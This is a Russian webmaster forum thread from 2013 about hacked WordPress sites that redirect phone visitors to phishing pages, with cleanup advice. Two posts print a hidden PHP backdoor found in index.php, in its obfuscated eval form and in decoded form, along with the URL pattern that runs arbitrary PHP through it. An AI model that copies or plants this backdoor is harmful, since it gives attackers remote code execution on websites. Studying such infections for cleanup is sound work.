Помощник
 |
|
|
|
|
Сообщение сайта
|
 Редирект на чужой сайт |
djalin
|
 23.1.2013, 18:18;
Ответить: djalin
Сообщение
#12
|
 Бывалый  Группа: User Сообщений: 415 Регистрация: 8.5.2011 Поблагодарили: 87 раз Репутация:  9 
 |
WordPress 2.9.2 -обновить надо б
проверьте комп на вирусню У меня на айфон и оперу мини не реагирует (юзал юзерагент) http://icqvk.com - вроде просто кликандер -------------------- |
 |
|
|
adkot
|
Сообщение
#13
|
 Бывалый Группа: User Сообщений: 420 Регистрация: 6.12.2009 Из: Волгоградская область Поблагодарили: 129 раз Репутация: 17
|
(viston @ 23.1.2013, 17:59)  вот у меня в этих файлах сидел php , и чистый htaccess был , мои сайты перебрасывало на установку флеш плеера У меня тоже, вот на этот сайт flash-ox.com Пишет, типа опера использует старую версию флеш плеера. Проверял на nokia c6-00 и Opera Mini s60. И на обычном ява-фоне. Сообщение отредактировал adkot - 23.1.2013, 18:28 |
|
|
|
|
duoseo
|
23.1.2013, 18:31;
Ответить: duoseo
Сообщение
#14
|
 Старожил Группа: Active User Сообщений: 2018 Регистрация: 24.11.2009 Из: Россия Поблагодарили: 1232 раза Репутация: 222
|
Несколько дней назад обнаружил подобную проблему, сам же ее потом и решил. Можете подробней узнать о моем случае, и о том как я решил проблему, в этой теме: http://www.maultalk.com/topic141806s0.html
|
|
|
|
|
adkot
|
Сообщение
#15
|
|
Бывалый Группа: User Сообщений: 420 Регистрация: 6.12.2009 Из: Волгоградская область Поблагодарили: 129 раз Репутация: 17
|
Ай-Болит не нашел вредоносное ПО.
В файле index.php нашел лишнюю строку. А именно эту Развернуть/Свернуть
if(isset($_GET[w8980t])){ $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,
93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,10 2 ,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61 , 115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115 , 116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34, 1 00,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,7 3 ,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100 , 105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116 , 69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116 , 39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,11 5 ,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,1 1 1,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92, 9 2,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101, 1 10,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120, 1 05,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d); } При том данный текст был спрятан справа и в одну строчку. На первый взгляд не заметно. Но его удаление ни к чему не привело. Еще, появились какие то странные файлы, выше директории public_html, имена типа wp-conf.php и тд. Вчера по удалял их с каждого домена, сегодня опять появились. Они появляются не только на сайтах на WordPress. |
|
|
|
|
x64
|
23.1.2013, 19:52;
Ответить: x64
Сообщение
#16
|
 F.A.L.L.O.U.T. Группа: Active User Сообщений: 4055 Регистрация: 30.6.2011 Из: Железнодорожный (Балашиха) Поблагодарили: 3409 раз Репутация: 331
|
выполняется такой код:
Развернуть/Свернуть
$p = @$_POST['p1'];
$m = sprintf("%c",92); if (strpos($p,"$m$m")) { $p = stripslashes($p); } ob_start(); eval($p); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo(strlen($temp)."\n".$temp); exit; может быть вызван так: http://site.ru/?w8980t=&p1={любой php код, будет выполнен} Сообщение отредактировал x64 - 23.1.2013, 19:53 |
|
|
|
|
4aa19
|
23.1.2013, 19:56;
Ответить: 4aa19
Сообщение
#17
|
 Старожил Группа: Active User Сообщений: 1041 Регистрация: 17.10.2010 Из: Мир Поблагодарили: 341 раз Репутация: 79
|
У меня было в htaccess, но нашёл это после того, как скачал весь сайт себе на комп и пересмотрел все файлы, которые редактировались только в день заражения, при обычном добавлении статей, на хостинг только картинки заливаются. Так что если последнее время сайт не редактировали, то тоже можете посмотреть файлы по дате изменения.
Сообщение отредактировал 4aa19 - 23.1.2013, 19:58 -------------------- |
|
|
|
|
adkot
|
Сообщение
#18
|
|
Бывалый Группа: User Сообщений: 420 Регистрация: 6.12.2009 Из: Волгоградская область Поблагодарили: 129 раз Репутация: 17
|
У меня все гораздо хуже. Зараженные файлы на каждом сайте. В каждом php файле тот код. Еще много других php и html файлов. Многие php имели имена типа wp-*****.php.
В общем, почистил все файлы, которые были изменены недавно (я ничего не менял там уже оочень давно), даже не чистил, а удалил и залил новые, оригинальные. Но толку ноль, все равно открывается фишинговый сайт. Сообщение отредактировал adkot - 23.1.2013, 20:34 |
|
|
|
|
x64
|
23.1.2013, 20:46;
Ответить: x64
Сообщение
#19
|
|
F.A.L.L.O.U.T. Группа: Active User Сообщений: 4055 Регистрация: 30.6.2011 Из: Железнодорожный (Балашиха) Поблагодарили: 3409 раз Репутация: 331
|
1) троян сидит на Вашем компе. естественно, все изменения бесполезны;
2) троян угнал пароли (Ваши, или ещё хуже админские от сервера) 3) на одном из сайтов Вашего аккаунта есть дырень, через которую успешно заливают шелл и имеют все сайты 4) шелл тихо-мирно сидит в каком-либо файле 5) ... вариантов масса. |
|
|
|
|
viston
|
24.1.2013, 2:22;
Ответить: viston
Сообщение
#20
|
 Завсегдатай Группа: Active User Сообщений: 549 Регистрация: 19.1.2010 Из: Приморский край город Уссурийск Поблагодарили: 98 раз Репутация: 16
|
Все файлы php проверь , смени пароли на хостинге на сайтах , у меня стоят 30 символов , я пере-установил вордпресс и потом только смог отредактировать htaccess, конфиг и все файлы на оригинальные. Плюс можешь вот этот плагин поставить AntiVirus - он сканирует на вирусы шаблон , WordPress File Monitor - а этот плагин настроить можно и он будет вам на почту отсылать какие файлы были изменены.
|
|
|
|
|
adkot
|
Сообщение
#21
|
|
|
Бывалый Группа: User Сообщений: 420 Регистрация: 6.12.2009 Из: Волгоградская область Поблагодарили: 129 раз Репутация: 17
|
Сегодня утром обнаружил, что все сайты с хостинга были удалены. Хорошо, что были копии (но уже зараженные). Купил новый хостинг у рег.ру, заливаю новые движки. А зараза даже есть глубоко в файле шаблона, в папке с картинками, в файле index.php, но на первый взгляд ее и не видно.
Установил сайты на новом хостинге, новые дистрибутивы скачивал. Все равно на сайте gouspo.ru при заходе с телефона открывается фишинговая страница. Когда сайт был полностью удален, при заходе с телефона открывалась 404 ошибка. А как только установил так фишинговая страница. Плагины AntiVirus и т.п. ничего не находят. Что это еще может быть?
|
|
|
|
|
|
|
|
Похожие темы
| Тема | Ответов | Автор | Просмотров | Последний ответ | |
|---|---|---|---|---|---|
 |
 [Услуги] Баннер/Графика/Сайт |
241 | FillPlay | 180650 | Сегодня, 15:19 автор: FillPlay |
 |
Будет ли склейка сайтов если старый телефон перенести на новый сайт? | 1 | noviktamw | 399 | Вчера, 18:31 автор: malamut |
|
Ваш сайт блокирует Роскомнадзор? | 29 | hollywooduk | 6023 | Вчера, 11:21 автор: hollywooduk |
|
Прототипирование + дизайн + вёрстка = красивый и эффективный сайт под ключ | 0 | bunneh | 463 | 16.4.2024, 18:02 автор: bunneh |
|
Если в сайт с одними ключами, которые там долго, добавить новую рубрику с новыми ключами | 2 | Tutich | 1333 | 16.4.2024, 8:27 автор: Tutich |
|
Текстовая версия | Сейчас: 25.4.2024, 16:27 |
